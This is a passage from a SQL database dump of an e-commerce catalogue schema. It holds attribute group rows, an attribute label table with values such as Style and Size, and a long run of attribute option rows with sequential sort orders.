(33, 10, 'Schedule Design Update', 55, 0, 'schedule-design-update', 'advanced'),
(34, 10, 'Design', 50, 0, 'design', 'advanced'),
(35, 10, 'Advanced Pricing', 40, 0, 'advanced-pricing', 'advanced'),
(36, 10, 'Search Engine Optimization', 30, 0, 'search-engine-optimization', 'basic'),
(37, 10, 'Images', 20, 0, 'image-management', 'basic'),
(38, 10, 'Bundle Items', 16, 0, 'bundle-items', NULL),
(39, 10, 'Content', 15, 0, 'content', 'basic'),
(40, 10, 'Product Details', 10, 1, 'product-details', 'basic'),
(41, 11, 'Gift Options', 61, 0, 'gift-options', NULL),
(42, 11, 'Autosettings', 60, 0, 'autosettings', 'advanced'),
(43, 11, 'Schedule Design Update', 55, 0, 'schedule-design-update', 'advanced'),
(44, 11, 'Design', 50, 0, 'design', 'advanced'),
(45, 11, 'Advanced Pricing', 40, 0, 'advanced-pricing', 'advanced'),
(46, 11, 'Search Engine Optimization', 30, 0, 'search-engine-optimization', 'basic'),
(47, 11, 'Images', 20, 0, 'image-management', 'basic'),
(48, 11, 'Bundle Items', 16, 0, 'bundle-items', NULL),
(49, 11, 'Content', 15, 0, 'content', 'basic'),
(50, 11, 'Product Details', 10, 1, 'product-details', 'basic'),
(51, 12, 'Gift Options', 61, 0, 'gift-options', NULL),
(52, 12, 'Autosettings', 60, 0, 'autosettings', 'advanced'),
(53, 12, 'Schedule Design Update', 55, 0, 'schedule-design-update', 'advanced'),
(54, 12, 'Design', 50, 0, 'design', 'advanced'),
(55, 12, 'Advanced Pricing', 40, 0, 'advanced-pricing', 'advanced'),
(56, 12, 'Search Engine Optimization', 30, 0, 'search-engine-optimization', 'basic'),
(57, 12, 'Images', 20, 0, 'image-management', 'basic'),
(58, 12, 'Bundle Items', 16, 0, 'bundle-items', NULL),
(59, 12, 'Content', 15, 0, 'content', 'basic'),
(60, 12, 'Product Details', 10, 1, 'product-details', 'basic'),
(61, 13, 'Gift Options', 61, 0, 'gift-options', NULL),
(62, 13, 'Autosettings', 60, 0, 'autosettings', 'advanced'),
(63, 13, 'Schedule Design Update', 55, 0, 'schedule-design-update', 'advanced'),
(64, 13, 'Design', 50, 0, 'design', 'advanced'),
(65, 13, 'Advanced Pricing', 40, 0, 'advanced-pricing', 'advanced'),
(66, 13, 'Search Engine Optimization', 30, 0, 'search-engine-optimization', 'basic'),
(67, 13, 'Images', 20, 0, 'image-management', 'basic'),
(68, 13, 'Bundle Items', 16, 0, 'bundle-items', NULL),
(69, 13, 'Content', 15, 0, 'content', 'basic'),
(70, 13, 'Product Details', 10, 1, 'product-details', 'basic'),
(71, 14, 'Gift Options', 61, 0, 'gift-options', NULL),
(72, 14, 'Autosettings', 60, 0, 'autosettings', 'advanced'),
(73, 14, 'Schedule Design Update', 55, 0, 'schedule-design-update', 'advanced'),
(74, 14, 'Design', 50, 0, 'design', 'advanced'),
(75, 14, 'Advanced Pricing', 40, 0, 'advanced-pricing', 'advanced'),
(76, 14, 'Search Engine Optimization', 30, 0, 'search-engine-optimization', 'basic'),
(77, 14, 'Images', 20, 0, 'image-management', 'basic'),
(78, 14, 'Bundle Items', 16, 0, 'bundle-items', NULL),
(79, 14, 'Content', 15, 0, 'content', 'basic'),
(80, 14, 'Product Details', 10, 1, 'product-details', 'basic'),
(81, 15, 'Gift Options', 61, 0, 'gift-options', NULL),
(82, 15, 'Autosettings', 60, 0, 'autosettings', 'advanced'),
(83, 15, 'Schedule Design Update', 55, 0, 'schedule-design-update', 'advanced'),
(84, 15, 'Design', 50, 0, 'design', 'advanced'),
(85, 15, 'Advanced Pricing', 40, 0, 'advanced-pricing', 'advanced'),
(86, 15, 'Search Engine Optimization', 30, 0, 'search-engine-optimization', 'basic'),
(87, 15, 'Images', 20, 0, 'image-management', 'basic'),
(88, 15, 'Bundle Items', 16, 0, 'bundle-items', NULL),
(89, 15, 'Content', 15, 0, 'content', 'basic'),
(90, 15, 'Product Details', 10, 1, 'product-details', 'basic');

-- --------------------------------------------------------

--
-- Table structure for table `eav_attribute_label`
--

CREATE TABLE `eav_attribute_label` (
  `attribute_label_id` int(10) UNSIGNED NOT NULL COMMENT 'Attribute Label ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `store_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Store ID',
  `value` varchar(255) DEFAULT NULL COMMENT 'Value'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Attribute Label';

--
-- Dumping data for table `eav_attribute_label`
--

INSERT INTO `eav_attribute_label` (`attribute_label_id`, `attribute_id`, `store_id`, `value`) VALUES
(2, 139, 1, 'Style'),
(6, 144, 1, 'Category'),
(11, 152, 1, 'Style'),
(13, 153, 1, 'Style'),
(17, 145, 1, 'Size');

-- --------------------------------------------------------

--
-- Table structure for table `eav_attribute_option`
--

CREATE TABLE `eav_attribute_option` (
  `option_id` int(10) UNSIGNED NOT NULL COMMENT 'Option ID',
  `attribute_id` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Attribute ID',
  `sort_order` smallint(5) UNSIGNED NOT NULL DEFAULT 0 COMMENT 'Sort Order'
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Eav Attribute Option';

--
-- Dumping data for table `eav_attribute_option`
--

INSERT INTO `eav_attribute_option` (`option_id`, `attribute_id`, `sort_order`) VALUES
(1, 20, 0),
(2, 20, 1),
(3, 20, 3),
(4, 130, 0),
(5, 130, 1),
(6, 130, 2),
(7, 130, 3),
(8, 130, 4),
(9, 130, 5),
(10, 130, 6),
(11, 130, 7),
(12, 130, 8),
(13, 130, 9),
(14, 130, 10),
(15, 130, 11),
(16, 130, 12),
(17, 130, 13),
(18, 130, 14),
(19, 130, 15),
(20, 130, 16),
(21, 130, 17),
(22, 130, 18),
(23, 130, 19),
(24, 130, 20),
(25, 130, 21),
(26, 130, 22),
(27, 130, 23),
(28, 130, 24),
(29, 130, 25),
(30, 130, 26),
(31, 130, 27),
(32, 130, 28),
(33, 130, 29),
(34, 130, 30),
(35, 130, 31),
(36, 130, 32),
(37, 130, 33),
(38, 130, 34),
(39, 130, 35),
(40, 130, 36),
(41, 130, 37),
(42, 130, 38),
(43, 130, 39),
(44, 130, 40),
(45, 130, 41),
(46, 130, 42),
(47, 130, 43),
(48, 130, 44),
(49, 130, 45),
(50, 130, 46),
(51, 130, 47),
(52, 130, 48),
(53, 130, 49),
(54, 130, 50),
(55, 130, 51),
(56, 130, 52),
(57, 130, 53),
(58, 130, 54),
(59, 130, 55),
(60, 130, 56),
(61, 130, 57),
(62, 130, 58),
(63, 130, 59),
(64, 130, 60),
(65, 130, 61),
(66, 130, 62),
(67, 130, 63),
(68, 130, 64),
(69, 130, 65),
(70, 130, 66),
(71, 130, 67),
(72, 130, 68),
(73, 130, 69),
(74, 130, 70),
(75, 130, 71),
(76, 130, 72),
(77, 130, 73),
(78, 130, 74),
(79, 130, 75),
(80, 130, 76),
(81, 130, 77),
(82, 130, 78),
(83, 130, 79),
(84, 130, 80),
(85, 130, 81),
(86, 130, 82),
(87, 130, 83),
(88, 130, 84),
(89, 130, 85),
(90, 130, 86),
(91, 130, 87),
(92, 130, 88),
(93, 130, 89),
(94, 130, 90),
(95, 130, 91),
(96, 130, 92),
(97, 130, 93),
(98, 130, 94),
(99, 130, 95),
(100, 130, 96),
(101, 130, 97),
(102, 130, 98),
(103, 130, 99),
(104, 130, 100),
(105, 130, 101),
(106, 130, 102),
(107, 130, 103),
(108, 130, 104),
(109, 130, 105),
(110, 130, 106),
(111, 130, 107),
(112, 130, 108),
(113, 130, 109),
(114, 130, 110),
(115, 130, 111),
(116, 130, 112),
(117, 130, 113),
(118, 130, 114),
(119, 130, 115),
(120, 130, 116),
(121, 130, 117),
(122, 130, 118),
(123, 130, 119),
(124, 130, 120),
(125, 130, 121),
(126, 130, 122),
(127, 130, 123),
(128, 130, 124),
(129, 130, 125),
(130, 130, 126),
(131, 130, 127),
(132, 130, 128),
(133, 130, 129),
(134, 130, 130),
(135, 130, 131),
(136, 130, 132),
(137, 130, 133),
(138, 130, 134),
(139, 130, 135),
(140, 130, 136),
(141, 130, 137),
(142, 130, 138),
(143, 130, 139),
(144, 130, 140),
(145, 130, 141),
(146, 130, 142),
(147, 130, 143),
(148, 130, 144),
(149, 130, 145),
(150, 130, 146),
(151, 130, 147),
(152, 130, 148),
(153, 130, 149),
(154, 130, 150),
(155, 130, 151),
(156, 130, 152),
(157, 130, 153),
(158, 130, 154),
(159, 130, 155),
(160, 130, 156),
(161, 130, 157),
(162, 130, 158),
(163, 130, 159),
(164, 130, 160),
(165, 130, 161),
(166, 130, 162),
(167, 130, 163),
(168, 130, 164),
(169, 130, 165),
(170, 130, 166),
(171, 130, 167),
(172, 130, 168),
(173, 130, 169),
(174, 130, 170),
(175, 130, 171),
(176, 130, 172),
(177, 130, 173),
(178, 130, 174),
(179, 130, 175),
(180, 130, 176),
(181, 130, 177),
(182, 130, 178),
(183, 130, 179),
(184, 130, 180),
(185, 130, 181),
(186, 130, 182),
(187, 130, 183),
(188, 130, 184),
(189, 130, 185),
(190, 130, 186),
(191, 130, 187),
(192, 130, 188),
(193, 130, 189),
(194, 130, 190),
(195, 130, 191),
(196, 130, 192),
(197, 130, 193),
(198, 130, 194),
(199, 130, 195),
(200, 130, 196),
(201, 130, 197),
(202, 130, 198),
(203, 130, 199),
(204, 130, 200),
(205, 130, 201),
(206, 130, 202),
(207, 130, 203),
(208, 130, 204),
(209, 130, 205),
(210, 130, 206),
(211, 130, 207),
(212, 130, 208),
(213, 130, 209),
(214, 130, 210),
(215, 130, 211),
(216, 130, 212),
(217, 130, 213),
(218, 130, 214),
(219, 130, 215),
(220, 130, 216),
(221, 130, 217),
(222, 130, 218),
(223, 130, 219),
(224, 130, 220),
(225, 130, 221),
(226, 130, 222),
(227, 130, 223),
(228, 130, 224),
(229, 130, 225),
(230, 130, 226),
(231, 130, 227),
(232, 130, 228),
(233, 130, 229),
(234, 130, 230),
(235, 130, 231),
(236, 130, 232),
(237, 130, 233),
(238, 130, 234),
(239, 130, 235),
(240, 130, 236),
(241, 130, 237),
(242, 130, 238),
(243, 130, 239),
(244, 130, 240),
(245, 130, 241),
(246, 130, 242),
(247, 130, 243),
(248, 130, 244),
(249, 130, 245),
(250, 130, 246),
(251, 130, 247),
(252, 130, 248),
(253, 130, 249),
(254, 130, 250),
(255, 130, 251),
(256, 130, 252),
(257, 130, 253),
(258, 130, 254),
(259, 130, 255),
(260, 130, 256),
(261, 130, 257),
(262, 130, 258),
(263, 130, 259),
(264, 130, 260),
(265, 130, 261),
(266, 130, 262),
(267, 130, 263),
(268, 130, 264),
(269, 130, 265),
(270, 130, 266),
(271, 130, 267),
(272, 130, 268),
(273, 130, 269),
(274, 130, 270),
(275, 130, 271),
(276, 130, 272),
(277, 130, 273),
(278, 130, 274),
(279, 130, 275),
(280, 130, 276),
(281, 130, 277),
(282, 130, 278),
(283, 130, 279),
(284, 130, 280),
(285, 130, 281),
(286, 130, 282),
(287, 130, 283),
(288, 130, 284),
(289, 130, 285),
(290, 130, 286),
(291, 130, 287),
(292, 130, 288),
(293, 130, 289),
(294, 130, 290),
(295, 130, 291),
(296, 130, 292),
(297, 130, 293),
(298, 130, 294),
(299, 130, 295),
(300, 130, 296),
(301, 130, 297),
(302, 130, 298),
(303, 130, 299),
(304, 130, 300),
(305, 130, 301),
(306, 130, 302),
(307, 130, 303),
(308, 130, 304),
(309, 130, 305),
(310, 130, 306),
(311, 130, 307),
(312, 130, 308),
(313, 130, 309),
(314, 130, 310),
(315, 130, 311),
(316, 130, 312),
(317, 130, 313),
(318, 130, 314),
(319, 130, 315),
(320, 130, 316),
(321, 130, 317),
(322, 130, 318),
(323, 130, 319),
(324, 130, 320),
(325, 130, 321),
(326, 130, 322),
(327, 130, 323),
(328, 130, 324),
(329, 130, 325),
(330, 130, 326),
(331, 130, 327),
(332, 130, 328),
(333, 130, 329),
(334, 130, 330),
(335, 130, 331),
(336, 130, 332),
(337, 130, 333),
(338, 130, 334),
(339, 130, 335),
(340, 130, 336),
(341, 130, 337),
(342, 130, 338),
(343, 130, 339),
(344, 130, 340),
(345, 130, 341),
(346, 130, 342),
(347, 130, 343),
(348, 130, 344),
(349, 130, 345),
(350, 130, 346),
(351, 130, 347),
(352, 130, 348),
(353, 130, 349),
(354, 130, 350),
(355, 130, 351),
(356, 130, 352),
(357, 130, 353),
(358, 130, 354),
(359, 130, 355),
(360, 130, 356),
(361, 130, 357),
(362, 130, 358),
(363, 130, 359),
(364, 130, 360),
(365, 130, 361),
(366, 130, 362),
(367, 130, 363),
(368, 130, 364),
(369, 130, 365),
(370, 130, 366),
(371, 130, 367),
(372, 130, 368),
(373, 130, 369),
(374, 130, 370),
(375, 130, 371),
(376, 130, 372),
(377, 130, 373),
(378, 130, 374),
(379, 130, 375),
(380, 130, 376),
(381, 130, 377),
(382, 130, 378),
(383, 130, 379),
(384, 130, 380),
(385, 130, 381),
(386, 130, 382),
(387, 130, 383),
(388, 130, 384),
(389, 130, 385),
(390, 130, 386),
(391, 130, 387),
(392, 130, 388),
(393, 130, 389),
(394, 130, 390),
(395, 130, 391),
(396, 130, 392),
(397, 130, 393),
(398, 130, 394),
(399, 130, 395),
(400, 130, 396),
(401, 130, 397),
(402, 130, 398),
(403, 130, 399),
(404, 130, 400),
(405, 130, 401),
(406, 130, 402),
(407, 130, 403),
(408, 130, 404),
(409, 130, 405),
(410, 130, 406),
(411, 130, 407),
(412, 130, 408),
(413, 130, 409),
(414, 130, 410),
(415, 130, 411),
(416, 130, 412),
(417, 130, 413),
(418, 130, 414),
(419, 130, 415),
(420, 130, 416),
(421, 130, 417),
(422, 130, 418),
(423, 130, 419),
(424, 130, 420),
(425, 130, 421),
(426, 130, 422),
(427, 130, 423),
(428, 130, 424),
(429, 130, 425),
(430, 130, 426),
(431, 130, 427),
(432, 130, 428),
(433, 130, 429),
(434, 130, 430),
(435, 130, 431),
(436, 130, 432),
(437, 130, 433),
(438, 130, 434),
(439, 130, 435),
(440, 130, 436),
(441, 130, 437),
(442, 130, 438),
(443, 130, 439),
(444, 130, 440),
(445, 130, 441),
(446, 130, 442),
(447, 130, 443),
(448, 130, 444),
(449, 130, 445),
(450, 130, 446),
(451, 130, 447),
(452, 130, 448),
(453, 130, 449),
(454, 130, 450),
(455, 130, 451),
(456, 130, 452),
(457, 130, 453),
(458, 130, 454),
(459, 130, 455),
(460, 130, 456),
(461, 130, 457),
(462, 130, 458),
(463, 130, 459),
(464, 130, 460),
(465, 130, 461),
(466, 130, 462),
(467, 130, 463),
(468, 130, 464),
(469, 130, 465),
(470, 130, 466),
(471, 130, 467),
(472, 130, 468),
(473, 130, 469),
(474, 130, 470),
(475, 130, 471),
(476, 130, 472),
(477, 130, 473),
(478, 130, 474),
(479, 130, 475),
(480, 130, 476),
(481, 130, 477),
(482, 130, 478),
(483, 130, 479),
(484, 130, 480),
(485, 130, 481),
(486, 130, 482),
(487, 130, 483),
(488, 130, 484),
(489, 130, 485),
(490, 130, 486),
(491, 130, 487),
(492, 130, 488),
(493, 130, 489),
(494, 130, 490),
(495, 130, 491),
(496, 130, 492),
(497, 130, 493),
(498, 130, 494),
(499, 130, 495),
(500, 130, 496),
(501, 130, 497),
(502, 130, 498),
(503, 130, 499),
(504, 130, 500),
(505, 130, 501),
(506, 130, 502),
(507, 130, 503),
(508, 130, 504),
(509, 130, 505),
(510, 130, 506),
(511, 130, 507),
(512, 130, 508),
(513, 130, 509),
(514, 130, 510),
(515, 130, 511),
(516, 130, 512),
(517, 130, 513),
(518, 130, 514),
(519, 130, 515),
(520, 130, 516),
(521, 130, 517),
(522, 130, 518),
(523, 130, 519),
(524, 130, 520),
(525, 130, 521),
(526, 130, 522),
(527, 130, 523),
(528, 130, 524),
(529, 130, 525),
(530, 130, 526),
(531, 130, 527),
(532, 130, 528),
(533, 130, 529),
(534, 130, 530),
(535, 130, 531),
(536, 130, 532),
(537, 130, 533),
(538, 130, 534),
(539, 130, 535),
(540, 130, 536),
(541, 130, 537),
(542, 130, 538),
(543, 130, 539),
(544, 130, 540),
(545, 130, 541),
(546, 130, 542),
(547, 130, 543),
(548, 130, 544),
(549, 130, 545),
(550, 130, 546),
(551, 130, 547),
(552, 130, 548),
(553, 130, 549),
(554, 130, 550),
(555, 130, 551),
(556, 130, 552),
(557, 130, 553),
(558, 130, 554),
(559, 130, 555),
(560, 130, 556),
(561, 130, 557),
(562, 130, 558),
(563, 130, 559),
(564, 130, 560),
(565, 130, 561),
(566, 130, 562),
(567, 130, 563),
(568, 130, 564),
(569, 130, 565),
(570, 130, 566),
(571, 130, 567),
(572, 130, 568),
(573, 130, 569),
(574, 130, 570),
(575, 130, 571),
(576, 130, 572),
(577, 130, 573),
(578, 130, 574),
(579, 130, 575),
(580, 130, 576),
(581, 130, 577),
(582, 130, 578),
(583, 130, 579),
(584, 130, 580),
(585, 130, 581),
(586, 130, 582),
(587, 130, 583),
(588, 130, 584),
(589, 130, 585),
(590, 130, 586),
(591, 130, 587),
(592, 130, 588),
(593, 130, 589),
(594, 130, 590),
(595, 130, 591),
(596, 130, 592),
(597, 130, 593),
(598, 130, 594),
(599, 130, 595),
(600, 130, 596),
(601, 130, 597),
(602, 130, 598),
(603, 130, 599),
(604, 130, 600),
(605, 130, 601),
(606, 130, 602),
(607, 130, 603),
(608, 130, 604),
(609, 130, 605),
(610, 130, 606),
(611, 130, 607),
(612, 130, 608),
(613, 130, 609),
(614, 130, 610),
(615, 130, 611),
(616, 130, 612),
(617, 130, 613),
(618, 130, 614),
(619, 130, 615),
(620, 130, 616),
(621, 130, 617),
(622, 130, 618),
(623, 130, 619),
(624, 130, 620),
(625, 130, 621),
(626, 130, 622),
(627, 130, 623),
(628, 130, 624),
(629, 130, 625),
(630, 130, 626),
(631, 130, 627),
(632, 130, 628),
(633, 130, 629),
(634, 130, 630),
(635, 130, 631),
(636, 130, 632),
(637, 130, 633),
(638, 130, 634),
(639, 130, 635),
(640, 130, 636),
(641, 130, 637),
(642, 130, 638),
(643, 130, 639),
(644, 130, 640),
(645, 130, 641),
(646, 130, 642),
(647, 130, 643),
(648, 130, 644),
(649, 130, 645),
(650, 130, 646),
(651, 130, 647),
(652, 130, 648),
(653, 130, 649),
(654, 130, 650),
(655, 130, 651),
(656, 130, 652),
(657, 130, 653),
(658, 130, 654),
(659, 130, 655),
(660, 130, 656),
(661, 130, 657),
(662, 130, 658),
(663, 130, 659),
(664, 130, 660),
(665, 130, 661),
(666, 130, 662),
(667, 130, 663),
(668, 130, 664),
(669, 130, 665),
(670, 130, 666),
(671, 130, 667),
(672, 130, 668),
(673, 130, 669),
(674, 130, 670),
(675, 130, 671),
(676, 130, 672),
(677, 130, 673),
(678, 130, 674),
(679, 130, 675),
(680, 130, 676),
(681, 130, 677),
(682, 130, 678),
(683, 130, 679),
(684, 130, 680),
(685, 130, 681),
(686, 130, 682),
(687, 130, 683),
(688, 130, 684),
(689, 130, 685),
(690, 130, 686),
(691, 130, 687),
(692, 130, 688),
(693, 130, 689),
(694, 130, 690),
(695, 130, 691),
(696, 130, 692),
(697, 130, 693),
(698, 130, 694),
(699, 130, 695),
(700, 130, 696),
(701, 130, 697),
(702, 130, 698),
(703, 130, 699),
(704, 130, 700),
(705, 130, 701),
(706, 130, 702),
(707, 130, 703),
(708, 130, 704),
(709, 130, 705),
(710, 130, 706),
(711, 130, 707),
(712, 130, 708),
(713, 130, 709),
(714, 130, 710),
(715, 130, 711),
(716, 130, 712),
(717, 130, 713),
(718, 130, 714),
(719, 130, 715),
(720, 130, 716),
(721, 130, 717),
(722, 130, 718),
(723, 130, 719),
(724, 130, 720),
(725, 130, 721),
(726, 130, 722),
(727, 130, 723),
(728, 130, 724),
(729, 130, 725),
(730, 130, 726),
(731, 130, 727),
(732, 130, 728),
(733, 130, 729),
(734, 130, 730),
(735, 130, 731),
(736, 130, 732),
(737, 130, 733),
(738, 130, 734),
(739, 130, 735),
(740, 130, 736),
(741, 130, 737),
(742, 130, 738),
(743, 130, 739),
(744, 130, 740),
(745, 130, 741),
(746, 130, 742),
(747, 130, 743),
(748, 130, 744),
(749, 130, 745),
(750, 130, 746),
(751, 130, 747),
(752, 130, 748),
(753, 130, 749),
(754, 130, 750),
(755, 130, 751),
(756, 130, 752),
(757, 130, 753),
(758, 130, 754),
(759, 130, 755),
(760, 130, 756),
(761, 130, 757),
(762, 130, 758),
(763, 130, 759),
(764, 130, 760),
(765, 130, 761),
(766, 130, 762),
(767, 130, 763),
(768, 130, 764),
(769, 130, 765),
(770, 130, 766),
(771, 130, 767),
(772, 130, 768),
(773, 130, 769),
(774, 130, 770),
(775, 130, 771),
(776, 130, 772),
(777, 130, 773),
(778, 130, 774),
(779, 130, 775),
(780, 130, 776),
(781, 130, 777),
(782, 130, 778),
(783, 130, 779),
(784, 130, 780),
(785, 130, 781),
(786, 130, 782),
(787, 130, 783),
(788, 130, 784),
(789, 130, 785),
(790, 130, 786),
(791, 130, 787),
(792, 130, 788),
(793, 130, 789),
(794, 130, 790),
(795, 130, 791),
(796, 130, 792),
(797, 130, 793),
(798, 130, 794),
(799, 130, 795),
(800, 130, 796),
(801, 130, 797),
(802, 130, 798),
(803, 130, 799),
(804, 130, 800),
(805, 130, 801),
(806, 130, 802),
(807, 130, 803),
(808, 130, 804),
(809, 130, 805),
(810, 130, 806),
(811, 130, 807),
(812, 130, 808),
(813, 130, 809),
(814, 130, 810),
(815, 130, 811),
(816, 130, 812),
(817, 130, 813),
(818, 130, 814),
(819, 130, 815),
(820, 130, 816),
(821, 130, 817),
(822, 130, 818),
(823, 130, 819),
(824, 130, 820),
(825, 130, 821),
(826, 130, 822),
(827, 130, 823),
(828, 130, 824),
(829, 130, 825),
(830, 130, 826),
(831, 130, 827),
(832, 130, 828),
(833, 130, 829),
(834, 130, 830),
(835, 130, 831),
(836, 130, 832),
(837, 130, 833),
(838, 130, 834),
(839, 130, 835),
(840, 130, 836),
(841, 130, 837),
(842, 130, 838),
(843, 130, 839),
(844, 130, 840),
(845, 130, 841),
(846, 130, 842),
(847, 130, 843),
(848, 130, 844),
(849, 130, 845),
(850, 130, 846),
(851, 130, 847),
(852, 130, 848),
(853, 130, 849),
(854, 130, 850),
(855, 130, 851),
(856, 130, 852),
(857, 130, 853),
(858, 130, 854),
(859, 130, 855),
(860, 130, 856),
(861, 130, 857),
(862, 130, 858),
(863, 130, 859),
(864, 130, 860),
(865, 130, 861),
(866, 130, 862),
(867, 130, 863),
(868, 130, 864),
(869, 130, 865),
(870, 130, 866),
(871, 130, 867),
(872, 130, 868),
(873, 130, 869),
(874, 130, 870),
(875, 130, 871),
(876, 130, 872),
(877, 130, 873),
(878, 130, 874),
(879, 130, 875),
(880, 130, 876),
(881, 130, 877),
(882, 130, 878),
(883, 130, 879),
(884, 130, 880),
(885, 130, 881),
(886, 130, 882),
(887, 130, 883),
(888, 130, 884),
(889, 130, 885),
(890, 130, 886),
(891, 130, 887),
(892, 130, 888),
(893, 130, 889),
(894, 130, 890),
(895, 130, 891),
(896, 130, 892),
(897, 130, 893),
(898, 130, 894),
(899, 130, 895),
(900, 130, 896),
(901, 130, 897),
(902, 130, 898),
(903, 130, 899),
(904, 130, 900),
(905, 130, 901),
(906, 130, 902),
(907, 130, 903),
(908, 130, 904),
(909, 130, 905),
(910, 130, 906),
(911, 130, 907),
(912, 130, 908),
(913, 130, 909),
(914, 130, 910),
(915, 130, 911),
(916, 130, 912),
(917, 130, 913),
(918, 130, 914),
(919, 130, 915),
(920, 130, 916),
(921, 130, 917),
(922, 130, 918),
(923, 130, 919),
(924, 130, 920),
(925, 130, 921),
(926, 130, 922),
(927, 130, 923),
(928, 130, 924),
(929, 130, 925),
(930, 130, 926),
(931, 130, 927),
(932, 130, 928),
(933, 130, 929),
(934, 130, 930),
(935, 130, 931),
(936, 130, 932),
(937, 130, 933),
(938, 130, 934),
(939, 130, 935),
(940, 130, 936),
(941, 130, 937),
(942, 130, 938),
(943, 130, 939),
(944, 130, 940),
(945, 130, 941),
(946, 130, 942),
(947, 130, 943),
(948, 130, 944),
(949, 130, 945),
(950, 130, 946),
(951, 130, 947),
(952, 130, 948),
(953, 130, 949),
(954, 130, 950),
(955, 130, 951),
(956, 130, 952),
(957, 130, 953),
(958, 130, 954),
(959, 130, 955),
(960, 130, 956),
(961, 130, 957),
(962, 130, 958),
(963, 130, 959),
(964, 130, 960),
(965, 130, 961),
(966, 130, 962),
(967, 130, 963),
(968, 130, 964),
(969, 130, 965),
(970, 130, 966),
(971, 130, 967),
(972, 130, 968),
(973, 130, 969),
(974, 130, 970),
(975, 130, 971),
(976, 130, 972),
(977, 130, 973),
(978, 130, 974),
(979, 130, 975),
(980, 130, 976),
(981, 130, 977),
(982, 130, 978),
(983, 130, 979),
(984, 130, 980),
(985, 130, 981),
(986, 130, 982),
(987, 130, 983),
(988, 130, 984),
(989, 130, 985),
(990, 130, 986),
(991, 130, 987),
(992, 130, 988),
(993, 130, 989),
(994, 130, 990),
(995, 130, 991),
(996, 130, 992),
(997, 130, 993),
(998, 130, 994),
(999, 130, 995),
(1000, 130, 996),
(1001, 130, 997),
(1002, 130, 998),
(1003, 130, 999),
(1004, 130, 1000),
(1005, 130, 1001),
(1006, 130, 1002),
(1007, 130, 1003),
(1008, 130, 1004),
(1009, 130, 1005),
(1010, 130, 1006),
(1011, 130, 1007),
(1012, 130, 1008),
(1013, 130, 1009),
(1014, 130, 1010),
(1015, 130, 1011),
(1016, 130, 1012),
(1017, 130, 1013),
(1018, 130, 1014),
(1019, 130, 1015),
(1020, 130, 1016),
(1021, 130, 1017),
(1022, 130, 1018),
(1023, 130, 1019),
(1024, 130, 1020),
(1025, 130, 1021),
(1026, 130, 1022),
(1027, 130, 1023),
(1028, 130, 1024),
(1029, 130, 1025),
(1030, 130, 1026),
(1031, 130, 1027),
(1032, 130, 1028),
(1033, 130, 1029),
(1034, 130, 1030),
(1035, 130, 1031),
(1036, 130, 1032),
(1037, 130, 1033),
(1038, 130, 1034),
(1039, 130, 1035),
(1040, 130, 1036),
(1041, 130, 1037),
(1042, 130, 1038),
(1043, 130, 1039),
(1044, 130, 1040),
(1045, 130, 1041),
(1046, 130, 1042),
(1047, 130, 1043),
(1048, 130, 1044),
(1049, 130, 1045),
(1050, 130, 1046),
(1051, 130, 1047),
(1052, 130, 1048),
(1053, 130, 1049),
(1054, 130, 1050),
(1055, 130, 1051),
(1056, 130, 1052),
(1057, 130, 1053),
(1058, 130, 1054),
(1059, 130, 1055),
(1060, 130, 1056),
(1061, 130, 1057),
(1062, 130, 1058),
(1063, 130, 1059),
(1064, 130, 1060),
(1065, 130, 1061),
(1066, 130, 1062),
(1067, 130, 1063),
(1068, 130, 1064),
(1069, 130, 1065),
(1070, 130, 1066),
(1071, 130, 1067),
(1072, 130, 1068),
(1073, 130, 1069),
(1074, 130, 1070),
(1075, 130, 1071),
(1076, 130, 1072),
(1077, 130, 1073),
(1078, 130, 1074),
(1079, 130, 1075),
(1080, 130, 1076),
(1081, 130, 1077),
(1082, 130, 1078),
(1083, 130, 1079),
(1084, 130, 1080),
(1085, 130, 1081),
(1086, 130, 1082),
(1087, 130, 1083),
(1088, 130, 1084),
(1089, 130, 1085),
(1090, 130, 1086),
(1091, 130, 1087),
(1092, 130, 1088),
(1093, 130, 1089),
(1094, 130, 1090),
(1095, 130, 1091),
(1096, 130, 1092),
(1097, 130, 1093),
(1098, 130, 1094),
(1099, 130, 1095),
(1100, 130, 1096),
(1101, 130, 1097),
(1102, 130, 1098),
(1103, 130, 1099),
(1104, 130, 1100),
(1105, 130, 1101),
(1106, 130, 1102),
(1107, 130, 1103),
(1108, 130, 1104),
(1109, 130, 1105),
(1110, 130, 1106),
(1111, 130, 1107),
(1112, 130, 1108),
(1113, 130, 1109),
(1114, 130, 1110),
(1115, 130, 1111),
(1116, 130, 1112),
(1117, 130, 1113),
(1118, 130, 1114),
(1119, 130, 1115),
(1120, 130, 1116),
(1121, 130, 1117),
(1122, 130, 1118),
(1123, 130, 1119),
(1124, 130, 1120),
(1125, 130, 1121),
(1126, 130, 1122),
(1127, 130, 1123),
(1128, 130, 1124),
(1129, 130, 1125),
(1130, 130, 1126),
(1131, 130, 1127),
(1132, 130, 1128),
(1133, 130, 1129),
(1134, 130, 1130),
(1135, 130, 1131),
(1136, 130, 1132),
(1137, 130, 1133),
(1138, 130, 1134),
(1139, 130, 1135),
(1140, 130, 1136),
(1141, 130, 1137),
(1142, 130, 1138),
(1143, 130, 1139),
(1144, 130, 1140),
(1145, 130, 1141),
(1146, 130, 1142),
(1147, 130, 1143),
(1148, 130, 1144),
(1149, 130, 1145),
(1150, 130, 1146),
(1151, 130, 1147),
(1152, 130, 1148),
(1153, 130, 1149),
(1154, 130, 1150),
(1155, 130, 1151),
(1156, 130, 1152),
(1157, 130, 1153),
(1158, 130, 1154),
(1159, 130, 1155),
(1160, 130, 1156),
(1161, 130, 1157),
(1162, 130, 1158),
(1163, 130, 1159),
(1164, 130, 1160),
(1165, 130, 1161),
(1166, 130, 1162),
(1167, 130, 1163),
(1168, 130, 1164),
(1169, 130, 1165),
(1170, 130, 1166),
(1171, 130, 1167),
(1172, 130, 1168),
(1173, 130, 1169),
(1174, 130, 1170),
(1175, 130, 1171),
(1176, 130, 1172),
(1177, 130, 1173),
(1178, 130, 1174),
(1179, 130, 1175),
(1180, 130, 1176),
(1181, 130, 1177),
(1182, 130, 1178),
(1183, 130, 1179),
(1184, 130, 1180),
(1185, 130, 1181),
(1186, 130, 1182),
(1187, 130, 1183),
(1188, 130, 1184),
(1189, 130, 1185),
